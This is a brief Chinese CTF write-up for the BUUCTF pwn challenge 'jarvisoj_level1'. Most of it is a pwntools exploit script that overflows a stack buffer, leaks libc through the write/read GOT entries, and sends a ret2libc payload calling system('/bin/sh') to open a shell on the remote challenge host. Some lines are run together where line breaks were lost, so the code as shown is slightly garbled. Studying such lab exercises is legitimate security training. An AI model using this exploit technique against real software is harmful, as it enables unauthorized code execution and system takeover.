[BUUCTF-pwn]——jarvisoj_level1
[BUUCTF-pwn]——jarvisoj_level1
- 题目地址:https://buuoj.cn/challenges#jarvisoj_level1
第一种直接构造shellcode
writeup
第二种泄露libc进行操作
from pwn import *
from LibcSearcher import *
p = remote("node3.buuoj.cn",26361)
#p = process("./level1")
elf = ELF("./level1")
#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
write_got = elf.got['write']
write_plt = elf.plt['write']
read_got = elf.got['read']
main = elf.symbols['main']
#gdb.attach(p)payload = 'a' * (0x88 + 4) + p32(write_plt) + p32(main) + p32(1) + p32(read_got) + p32(4)
p.send(payload)
read_addr = u32(p.recv(4))
log.success("read_addr ---->:" + hex(read_addr))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')info("libc_base -----> " + hex(libc_base))
sys = libc_base +libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
payload = 'a' * (0x88 + 4) + p32(sys) + p32(main) + p32(binsh)
p.send(payload)
p.interactive()本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!